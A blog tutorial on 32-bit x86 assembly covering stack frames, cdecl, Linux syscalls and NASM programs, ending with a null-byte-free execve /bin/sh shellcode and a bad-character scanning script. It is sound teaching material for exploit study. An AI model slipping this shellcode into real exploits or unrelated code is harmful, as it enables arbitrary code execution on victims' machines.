Shellcode i386 - 0x101

jamarirjamarir
23 min read

eJust another c2asm / cdecl / .data / .text / int 0x80 / execve / bad chars cleanup write-up.

Reversing C code 0×101

Program

Let’s consider the following main.c code:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    return;
}

We’ll use the following GCC command to compile:

jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c

Then, we may disassemble the executable using either gdb or objdump to see the associated assembly instructions:

jamarir@kali:~$ echo "set disassembly-flavor intel" > ~/.gdbinit
jamarir@kali:~$ echo "set confirm off" >> ~/.gdbinit
jamarir@kali:~$ echo "set pagination off" >> ~/.gdbinit
jamarir@kali:~$ gdb -q main
Reading symbols from main...
(No debugging symbols found in main)

(gdb) disass add
Dump of assembler code for function add:
   0x0000117d <+0>:     push   ebp
   0x0000117e <+1>:     mov    ebp,esp
   0x00001180 <+3>:     mov    edx,DWORD PTR [ebp+0x8]
   0x00001183 <+6>:     mov    eax,DWORD PTR [ebp+0xc]
   0x00001186 <+9>:     add    eax,edx
   0x00001188 <+11>:    pop    ebp
   0x00001189 <+12>:    ret
End of assembler dump.

(gdb) disass main
Dump of assembler code for function main:
   0x0000118a <+0>:     push   ebp
   0x0000118b <+1>:     mov    ebp,esp
   0x0000118d <+3>:     sub    esp,0x10
   0x00001190 <+6>:     push   0x2
   0x00001192 <+8>:     push   0x1
   0x00001194 <+10>:    call   0x117d <add>
   0x00001199 <+15>:    add    esp,0x8
   0x0000119c <+18>:    mov    DWORD PTR [ebp-0x4],eax
   0x0000119f <+21>:    nop
   0x000011a0 <+22>:    leave
   0x000011a1 <+23>:    ret
End of assembler dump.
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
Disassembly of section .text:
[...]

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx
    1188:       5d                      pop    ebp
    1189:       c3                      ret

0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
    1190:       6a 02                   push   0x2
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8
    119c:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    119f:       90                      nop
    11a0:       c9                      leave
    11a1:       c3                      ret

Prologue

As we can see, both functions starts with a similar pattern, known as the function’s prologue:

push ebp
mov    ebp, esp
sub    esp, N

This prologue is used to register the previous “program’s state” when it jumped into a function. Its purpose is mainly to save the base register ebp (or more, if applicable) onto the stack before setting it to esp.

The base register is used to perform lookups on local variables (using [ebp - N]) and function’s inputs (using [ebp + N]).

Then, the stack pointer is decreased by some amount to keep space for local variables. For instance, in the main function, we declared one variable, int z, whose size is 4 bytes. Given that one memory slot is 4 bytes (32-bit), here the stack makes room for 4 slots (0×10 = 16):

    118d:       83 ec 10                sub    esp,0x10

Therefore, this decrease would be enough to store 4 integers for example. See how sub esp, 0x10 is kept with 4 integers declared in main:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    int a = 1;
    int b = 2;
    int c = 3;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c; objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
[...]

While declaring a fifth integer requires more space into the stack:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    int a = 1;
    int b = 2;
    int c = 3;
    int d = 4;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c; objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 20                sub    esp,0x20
[...]

Here, 0×20 = 32 is enough to contain 5 integers, fitting into 20 bytes.

The stack pointer isn’t substracted by the extact needed amount of slots (e.g. sub esp, 0×4 if one integer is declared) because the calling convention forces a stack optimization, where the stack pointer is always 16-byte-aligned in a 64-bit Windows:

Removing such optimization constraints with the -mpreferred-stack-boundary=2 GCC flag makes the sub esp, N instruction using N as minimal as possible:

  • 1 local integer (4 bytes) declaration:
void main() {
    int z = add(1, 2);
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -mpreferred-stack-boundary=2 -o main main.c
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 04                sub    esp,0x4
[...]
  • 2 local integers (8 bytes) declaration:
void main() {
    int z = add(1, 2);
    int a = 0;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -mpreferred-stack-boundary=2 -o main main.c
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 08                sub    esp,0x8
[...]

Call

When we execute the call instruction at address 1194 in the main function:

0000117d <add>:
[...]

0000118a <main>:
[...]
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8

call is actually performing 2 instructions, a push and a jump:

push <eip + opcode_size>
jump 117d

The push allows us to save the next instruction pointer after we finished the call. Here, we wanna push 1199, i.e. eip + 5 = 1194 + 5, where 5 is the size of the call opcode: e8 e4 ff ff ff. That saved eip is also called the return address (RET).

Epilogue

Finally, each function executes its epilogue. The epilogue is used to restore the execution’s state before entering a function, i.e. restoring:

  • esp to ebp, if the stack pointer has been altered within the function.

  • ebp to its backup via a pop ebp instruction.

  • eip to its backup via a ret (equivalent to pop eip) instruction.

0000117d <add>:
[...]
    1188:       5d                      pop    ebp
    1189:       c3                      ret

0000118a <main>:
[...]
    11a0:       c9                      leave
    11a1:       c3                      ret

As we can see, the add function executed a pop ebp in its epilogue, while main executed leave instead. leave is equivalent to restoring both esp and ebp, i.e.:

mov esp, ebp
pop ebp

The reason why the add's epilogue isn’t restoring esp to ebp is because esp wasn’t altered in that function:


0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx
    1188:       5d                      pop    ebp
    1189:       c3                      ret

If, however, we forced an esp alteration into add, then its epilogue would effectively be:

mov esp, ebp
pop ebp
ret

Or:

leave
ret

As shown below, where a local res declaration implies a sub esp,0x10 instruction:

int add(int x, int y) {
    int res = x + y;
    return res;
}

void main() {
    int z = add(1, 2);
    return;
}
0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       83 ec 10                sub    esp,0x10
    1183:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1186:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1189:       01 d0                   add    eax,edx
    118b:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    118e:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]
    1191:       c9                      leave
    1192:       c3                      ret

cdecl Calling Conventions

When calling the add function:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    return;
}

We see that the function’s arguments 1 and 2 are pushed onto the stack on the reverse order before the call:

0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
    1190:       6a 02                   push   0x2
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>

That’s because the calling convention is __cdecl, default for C and C++ programs, which states that the arguments should be pushed from right to left (i.e. 2 first, then 1 for add(1, 2)).

The fact that arguments are pushed before the call is generally applicable only for x86 architectures. In a 64-bit architecture, the first arguments are placed in registers instead. The remaining ones are pushed onto the stack:

Therefore, the stack looks like the following before executing the call at address 1194:

In any stack representation, as we’re using an Intel CPU, the high addresses are at the bottom, while the low addresses are at the top. Please, don’t do the opposite (i.e. stack-top at bottom…) :’(

First, the program saved an ebp register before main is called, annotated ebp?.

We don’t know for which function prior main ebp? is used, but we don’t care. Even if we don’t see its associated push ebp instruction, we know that ebp is always pointing to its backed up value.

Then, it declared a z variable in our main function. Therefore, the stack pointer prepared 4-stack-optimized-slots for our local variables as we saw earlier (sub esp, 0×10). Finally, it pushed the 2 arguments onto the stack to prepare the add(1, 2) call.

When we enter the add function, it performs its prologue, so the stack’s state becomes:

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp

As the call instruction implicitely stored the main’s eip, it has been pushed before saving the main’s ebp.

Notice how ebp is pointing to its backed up value.

Now that we saved our main’s registers, we can set ebp to esp for local and input lookups in add(). For instance, ebp+8 is the first function’s argument, and ebp+c is the second one. This explains the next instructions:

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx

edx is set to 1, and eax to 2. Finally, we add edx into eax, which equals 3.

Again, add() executes its epilogue, which puts the stack into the following state when pop ebp is executed:

    1188:       5d                      pop    ebp
    1189:       c3                      ret

Return value

Back into the main function, we see that the value at ebp-4 (i.e. [ebp-4] = z in our case) is set to eax:

    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8
    119c:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    119f:       90                      nop
    11a0:       c9                      leave
    11a1:       c3                      ret

Indeed, for 32-bit programs, if a function returns a value, it implicitely stores it into eax. Therefore, z = add(1, 2). At the instruction at address 11a0 (i.e. before the main’s epilogue), the final stack’s state becomes:

Writing ASM code 0×101

Now that we have a basic understanding how of assembly works, let’s write our first assembly script.

HelloWorld (.data)

.data & .text sections

Consider the following ASM script:

BITS 32
section .data
        msg db "Hello World!",0x0a

section .text
global _start
_start:
        ; write(1, msg, 14)
        mov ebx, 1
        mov ecx, msg
        mov edx, 14
        mov eax, 4
        int 80h

        ; exit(0)
        mov ebx, 0
        mov eax, 1
        int 0x80

Compiled using the Makefile:

jamarir@kali:~$ cat Makefile
NASM=nasm
LD=ld
fasm=helloworld1

elf:
    $(NASM) $(fasm).asm -f elf32 -g
    $(LD) $(fasm).o -o $(fasm).elf -m elf_i386

clean:
    rm *.o *.elf 2>/dev/null
jamarir@kali:~$ make
nasm helloworld1.asm -f elf32 -g
ld helloworld1.o -o helloworld1.elf -m elf_i386

N.B. : The spaces at the beginning of the Makefile’s lines MUST be one tabulation.

When executed, it effectively prints Hello World!:

jamarir@kali:~$ ./helloworld1.elf
Hello World!

First, we specified that our program will be using the 32-bit architecture:

BITS 32

Then, we used the .data section to declare our string in a variable named msg, which will contain Hello World! + \n:

section .data
        msg db "Hello World!",0x0a

That .data section is used to declare static / global variables that can be used in our code, itself stored in the .text section.

_start symbol

The _start symbol allows to specify where our program should start when linked. Thus:

  • If the _start symbol is missing, it defaults to the beginning of the .text section:

      [...]
      section .text
              ; write(1, msg, 14)
              mov ebx, 1
              mov ecx, msg
              mov edx, 14
              mov eax, 4
              int 80h
    
              ; exit(0)
              mov ebx, 0
              mov eax, 1
              int 0x80
    
      jamarir@kali:~$ make
      nasm helloworld1.asm -f elf32 -g
      ld helloworld1.o -o helloworld1.elf -m elf_i386
      ld: warning: cannot find entry symbol _start; defaulting to 08049000
    
      jamarir@kali:~$ objdump -M intel -d -j .text helloworld1.elf
      [...]
      08049000 <.text>:
       8049000:       bb 01 00 00 00          mov    ebx,0x1
      [...]
    
      jamarir@kali:~$ ./helloworld1.elf
      Hello World!
    
  • If the _start symbol is defined, then the program starts wherever the symbol is placed:

      [...]
      section .text
      global _start
              ; write(1, msg, 14)
              mov ebx, 1
              mov ecx, msg
              mov edx, 14
              mov eax, 4
              int 80h
      _start:
              ; exit(0)
              mov ebx, 0
              mov eax, 1
              int 0x80
    
      jamarir@kali:~$ objdump -M intel -d -j .text helloworld1.elf
      [...]
      08049000 <_start-0x16>:
       8049000:       bb 01 00 00 00          mov    ebx,0x1
       8049005:       b9 00 a0 04 08          mov    ecx,0x804a000
       804900a:       ba 0e 00 00 00          mov    edx,0xe
       804900f:       b8 04 00 00 00          mov    eax,0x4
       8049014:       cd 80                   int    0x80
    
      08049016 <_start>:
       8049016:       bb 00 00 00 00          mov    ebx,0x0
       804901b:       b8 01 00 00 00          mov    eax,0x1
       8049020:       cd 80                   int    0x80
    
      jamarir@kali:~$ ./helloworld1.elf
      [no output]
    

Software interruption in 80 hours ?

Finally, in the .text section, we called 2 functions, i.e. write() and exit():

; write(1, msg, 14)
mov ebx, 1
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h
; exit(0)
mov ebx, 0
mov eax, 1
int 0x80

To do so, we used the magical int 80h instruction (software interrupt 80h). This allows us to perform system calls (aka. syscalls). In a Linux distribution, the 32-bit syscalls are listed in the /usr/include/asm/unistd_32.h header:

jamarir@kali:~$ cat /usr/include/asm/unistd_32.h
#ifndef _ASM_UNISTD_32_H
#define _ASM_UNISTD_32_H

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
[...]

And its call convention is defined in the page 2 of the syscall manual:

jamarir@kali:~$ man man

jamarir@kali:~$ man 2 syscall

Every syscall’s signature are documented in its second page. For example, man 2 exit gives the exit() syscall’s signature:

If we want to call exit(0) to close the program, we must:

  • Set eax to 1, i.e. the syscall number of exit.

  • Set ebx to 0, i.e. the first syscall’s argument.

  • Perform the system call using the int 80h (or int 0×80) instruction.

; exit(0)
mov ebx, 0
mov eax, 1
int 80h

For write(1, msg, 14), the syscall definition is:

Thus, we:

; write(1, msg, 14)
mov ebx, 1
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h

If, for example, we’ve set the file descriptor to the standard error output (2) and redirected it to /dev/null, the text wouldn’t be shown:

; write(2, msg, 14)
mov ebx, 2
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h
jamarir@kali:~$ ./helloworld1.elf 2>/dev/null
jamarir@kali:~$ ./helloworld1.elf
Hello World!

Similarly, showing 5 characters only, i.e. Hello without its ending NULL-byte, would result in the following output:

; write(1, msg, 5)
mov ebx, 1
mov ecx, msg
mov edx, 5
mov eax, 4
int 80h
jamarir@kali:~$ ./helloworld1.elf
Hello

HelloWorld (.text)

Another way to print our Hello World text is to exclusively use the stack, with no .data section:

BITS 32
section .text
global _start
_start:
        ; write(1, "Hello World\n", 14)
        mov ebx, 1
        push 0
        push 0x0a646c72 ; "\ndlr"
        push 0x6f57206f ; "oW o"
        push 0x6c6c6548 ; "lleH"
        mov ecx, esp
        mov edx, 14
        mov eax, 4
        int 80h

        ; exit(0)
        mov ebx, 0
        mov eax, 1
        int 0x80
jamarir@kali:~$ make
jamarir@kali:~$ ./helloworld2.elf
Hello World

When the whole string is pushed, the stack’s state is the following:

First, we push the string terminator NULL (0) on the stack.

Second, it should be noted that the stack slots respect a little-endian architecture. Therefore, low-addresses are on the right of the slot, while high-addresses are on the left. Finally, the way variables are read onto the stack is opposite to the way they’re written. Therefore:

  • We write data on the stack from bottom to top (pushing values for example).

  • We read data on the stack from top to bottom (poping values for example).

Thus, Hello World must be pushed backwards for it to be read Hello World.

For instance, if we consider the following C program:

#include <stdio.h>
void main() {
    char *s = "ABCD";
    printf("%c", *(s+1));
    return;
}

It prints 'B', where s is pointing to the first character of the string ('A'), and s+1 the second ('B'):

jamarir@kali:~$ gcc main.c; ./a.out
B

Therefore, the way data is read is incremental with the address.

Once our string is pushed, we can set the second write’s argument to esp, so that it references our string:

        mov ecx, esp

Finally, we call write and exit with int 80h, as usual.

The individual pushes could be seen in gdb using the x/Nx $sp instruction:

jamarir@kali:~$ gdb -q helloworld2.elf
Reading symbols from helloworld2.elf...
(gdb) disass _start
Dump of assembler code for function _start:
   0x08049000 <+0>:     mov    ebx,0x1
   0x08049005 <+5>:     push   0x0
   0x08049007 <+7>:     push   0xa646c72
   0x0804900c <+12>:    push   0x6f57206f
   0x08049011 <+17>:    push   0x6c6c6548
   0x08049016 <+22>:    mov    ecx,esp
   0x08049018 <+24>:    mov    edx,0xe
   0x0804901d <+29>:    mov    eax,0x4
   0x08049022 <+34>:    int    0x80
   0x08049024 <+36>:    mov    ebx,0x0
   0x08049029 <+41>:    mov    eax,0x1
   0x0804902e <+46>:    int    0x80
End of assembler dump.

(gdb) break *_start+22
(gdb) run
(gdb) x/4x $sp
0xffffce30:     0x6c6c6548      0x6f57206f      0x0a646c72      0x00000000

In particular, we see that esp is 0xffffce30, thus the first 2 characters read from esp are at esp+0 and esp+1, i.e. H (0×48) and e (0×65):

(gdb) info registers
eax            0x0                 0
ecx            0x0                 0
edx            0x0                 0
ebx            0x1                 1
esp            0xffffce30          0xffffce30
ebp            0x0                 0x0
esi            0x0                 0
edi            0x0                 0
eip            0x8049016           0x8049016 <_start+22>
[...]

(gdb) x/2c $esp
0xffffce30:     72 'H'  101 'e'

While the string (until a NULL byte is found on the stack) is:

(gdb) x/s $esp
0xffffce30:     "Hello World\n"

FileWrite

Open

Using the same methodology, we can write an assembly script that writes a string into a file via the write syscall:

First, we need a file descriptor (fd) to a file using the open() syscall:

We’ll first push "./file.txt" for the pathname in our ASM script (using CyberChef to make the little-endian writting easier):

BITS 32
section .text
global _start
_start:
    ; open("./file.txt", O_CREAT | O_RDWR, 644)
    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2f2f2e
    mov ebx, esp

Notice that we added 2 slashes: .///file.txt. That’s because if we only pushed ./file.txt, the instruction would end up being:

    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2e      ; equivalent to "push 0x00002f2e"

But in such a case, the last push instruction would push 2 NULL bytes (because the push / pop instructions can only reason in the size of a slot, also named a word, i.e. 4 bytes fot 32-bit programs), leaving the stack’s state to:

As a result, when our pathname string is read by the program, it would be interpreted as "./", because the NULL byte at esp+2 terminated it earlier than expected. To prevent such string termination, we add redundant, and insignificant, slashes.

The open’s flags are defined in the /usr/include/x86_64-linux-gnu/bits/fcntl-linux.h or /usr/include/asm-generic/fcntl.h header files:

jamarir@kali:~$ grep -rni 'O_RDWR' /usr/include/
[...]
/usr/include/asm-generic/fcntl.h:22:#define O_RDWR              00000002
/usr/include/x86_64-linux-gnu/bits/fcntl-linux.h:45:#define O_RDWR                   02
[...]
jamarir@kali:~$ grep '^#\s*define' /usr/include/asm-generic/fcntl.h
[...]
#define _ASM_GENERIC_FCNTL_H
#define O_ACCMODE       00000003
#define O_RDONLY        00000000
#define O_WRONLY        00000001
#define O_RDWR          00000002
#define O_CREAT         00000100        /* not fcntl */
#define O_EXCL          00000200        /* not fcntl */
#define O_NOCTTY        00000400        /* not fcntl */
#define O_TRUNC         00001000        /* not fcntl */
#define O_APPEND        00002000
[...]

In our case, we want the O_CREAT (create file if doesn’t exist) and O_RDWR (read and write permissions) flags. Then, we’ll add them up (OR operation), giving the flag 100+2=102.

    mov ecx, 0q102

This is an octal (102) representation of our flags, in base 8, which can be translated into decimal (66) using the following C program:

#include <fcntl.h>
#include <stdio.h>
void main() {
    printf("%o\n", O_CREAT | O_RDWR); // prints 102
    printf("%d\n", O_CREAT | O_RDWR); // prints 66
    return;
}

NASM scripts support octal representations, using a o suffix, or 0q prefix for example.

Similarly, we set the mode (permissions of the created file) to 644 as the third parameter:

    mov ecx, 0q644

Finally, our syscall is 5.

jamarir@kali:~$ grep 'open ' /usr/include/asm/unistd_32.h
#define __NR_open 5
    mov eax, 5
    int 0x80

Write

The open’s result being stored into eax, we can grab that file descriptor into ebx, the first parameter of the write syscall:

    mov ebx, eax

Then, we can write AAAABBBB in the file for example, pushing that 8-characters buffer onto the stack as our second argument:

    push 0
    push 0x42424242
    push 0x41414141

And set the length to be written to 8 characters, before calling the write syscall:

jamarir@kali:~$ grep 'write' /usr/include/asm/unistd_32.h
#define __NR_write 4
    mov edx, 8
    mov eax, 4
    int 0x80

Close & Exit

The next instructions should be self-explanatory now (otherwise, press ALT+F4, or CTRL+W):

    mov eax, 6
    int 0x80

    mov eax, 1
    int 0x80

For reference, the whole NASM script is:

BITS 32
section .text
global _start
_start:
    ; open("./file.txt", O_CREAT | O_RDWR, 644)
    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2f2f2e
    mov ebx, esp
    mov ecx, 0q102
    mov edx, 0q644
    mov eax, 5
    int 0x80

    ; write(fd, "AAAABBBB", 8)
    mov ebx, eax
    push 0
    push 0x42424242
    push 0x41414141
    mov ecx, esp
    mov edx, 8
    mov eax, 4
    int 0x80

    ; close(fd)
    mov eax, 6
    int 0x80

    ; exit()
    mov eax, 1
    int 0x80

Which produces the following ./file.txt:

jamarir@kali:~$ nasm writefile.asm -f elf32 -g
jamarir@kali:~$ ld writefile.o -o writefile.elf -m elf_i386
jamarir@kali:~$ ./writefile.elf
jamarir@kali:~$ ls -ld file.txt |sed -e 's/ .*//'
-rw-r--r--
jamarir@kali:~$ cat file.txt
AAAABBBB

Shell execve

The execve syscall can be used in order to execute a binary in the file system. In its simplest while sufficient form, we may spawn a shell using the following call:

#include <unistd.h>
void main() {
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL );
}
jamarir@kali:~$ ./main
$ echo Hello
Hello

Then, we could use the following ASM script to do the same:

BITS 32
section .text
global _start
_start:
    ; "//bin/sh"
    push 0
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    ; { "//bin/sh", NULL }
    push 0
    push ebx
    mov ecx, esp
    ; NULL
    mov edx, 0

    ; execve("//bin/sh", { "//bin/sh", NULL }, NULL )
    mov eax, 11
    int 0x80

    ; exit()
    mov eax, 1
    int 0x80

jamarir@kali:~$ nasm execve.asm -f elf32 -g
jamarir@kali:~$ ld execve.o -o execve.elf -m elf_i386;
jamarir@kali:~$ ./execve.elf;
$ echo 'Hello World! (again...)'
Hello World! (again...)

Get rid of these BAD & EXTRA bytes !

The issue with our above shellcode (execve binary) is that it contains many NULL bytes:

jamarir@kali:~$ objcopy -O binary --only-section=.text execve.elf /dev/stdout |xxd -i
  0x6a, 0x00, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69,
  0x89, 0xe3, 0x6a, 0x00, 0x53, 0x89, 0xe1, 0xba, 0x00, 0x00, 0x00, 0x00,
  0xb8, 0x0b, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x00,
  0xcd, 0x80

Even if it worked here, the purpose of a shellcode is to be injected into a user’s input (generally a string), and executed. But if our shellcode contains NULL bytes, then our user input / shellcode would be truncated. In our example, if we inject such shellcode in a string, the program would only interpret the following:

  0x6a

Which breaks our shellcode.

String Terminators

To identify all the string terminators in a string through scanf("%s"), let’s consider the following C code, reading a string from the user’s input:

#include <stdio.h>

void main() {
    char buf1[100];
    printf("Input: ");
    scanf("%s", buf1);
    printf("%s\n", buf1);
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c

When injecting string terminators, such as \x00, or \x0b, the string terminates:

jamarir@kali:~$ python2 -c "print'AAAA'+'\x00'+'BBBB'" |./main
Input: AAAA
jamarir@kali:~$ python2 -c "print'AAAA'+'\x0b'+'BBBB'" |./main
Input: AAAA

The following python script can be used in order to scan for bad chars (i.e. string terminators):

#!/usr/bin/python3
import string
import subprocess
import sys

# usage: ./badchars.py './main'
for x in string.hexdigits.lower()[:16]:
    for y in string.hexdigits.lower()[:16]:
        payload = b"AAAA" + bytes([int(x + y, 16)]) + b"BBBB"
        res = subprocess.run(
            [sys.argv[1]],
            input=payload,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        ).stdout.decode(errors="replace")
        if not ('AAAA' in res and 'BBBB' in res):
            print(f'\\x{x}{y} is a bad char')

Which gives the following bytes:

jamarir@kali:~$ python badchars.py './main'
\x00 is a bad char
\x09 is a bad char
\x0a is a bad char
\x0b is a bad char
\x0c is a bad char
\x0d is a bad char
\x20 is a bad char

The bad chars vary from function to function. For instance, if we used fgets() to read the user input instead:

    fgets(buf1, sizeof(buf1), stdin);

The bad chars would only have been NULL and LF:

jamarir@kali:~$ python badchars.py './main'
\x00 is a bad char
\x0a is a bad char

Shellcode Cleanup

Therefore, when writing a shellcode, we mustn’t provide explicit or implicit bad chars into the instructions. For instance, the following instructions should be proscribed:

We can use this online x86 assembler for reference.

  • mov eax, 1: This instruction is writing 1 into the EAX register, whose size is 32 bits. Therefore, the instruction actually contains implicit NULL bytes.

    A better alternative is to first NULL eax register, and then set its low byte al to 1:

  • NULL: Any instruction containing a 0 should obviously be discarded, such as cmp esi, 0 or push 0 for example:

    Again, a better alternative is to first NULL a register (e.g. eax), and then play with it:

  • mov al, 11: Our execve syscall is 11. Therefore, setting al to 11 implies the insertion of a bad char:

    An alternative would be to first set it to 14, then subtract 3:

Shellcode Shrinkage

Also, we might shrink our shellcode:

  • Removing the last exit() syscall, as our main purpose is solely to spawn a shell, which we already did.

  • Using the cdq instruction. This instruction copies the sign (bit 31) bit of eax into every bit in edx. In the particular case where eax is NULL, it will duplicate eax into edx, both ending NULL. cdq being a 1-size opcode, we’ll save 1 byte compared to our mov edx, eax equivalent:

  • NULL’ing the second execve's argument, as it is not compulsory to spawn a shell.

Our final shellcode looks like:

BITS 32
section .text
global _start
_start:
    ; "//bin/sh"
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    ; NULL
    mov ecx, eax
    ; NULL
    cdq

    ; execve("//bin/sh", NULL, NULL )
    mov al, 14
    sub al, 3
    int 0x80
jamarir@kali:~$ nasm execve.asm -f elf32 -g; ld execve.o -o execve.elf -m elf_i386;
jamarir@kali:~$ objcopy -O binary --only-section=.text execve.elf /dev/stdout |xxd -i |sed -n 's/0x/\\x/gp' |sed -n 's/,\?\s*//gp' |tr -d '\n'
\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\x99\xb0\x0e\x2c\x03\xcd\x80
jamarir@kali:~$ expr length $(python2 -c "print'\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\x99\xb0\x0e\x2c\x03\xcd\x80'")
23

We could even save one extra byte using a xor / mul trick to set ecx, eax and edx to NULL. But let’s call it a day.

0
Subscribe to my newsletter

Read articles from jamarir directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

jamarir
jamarir

Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO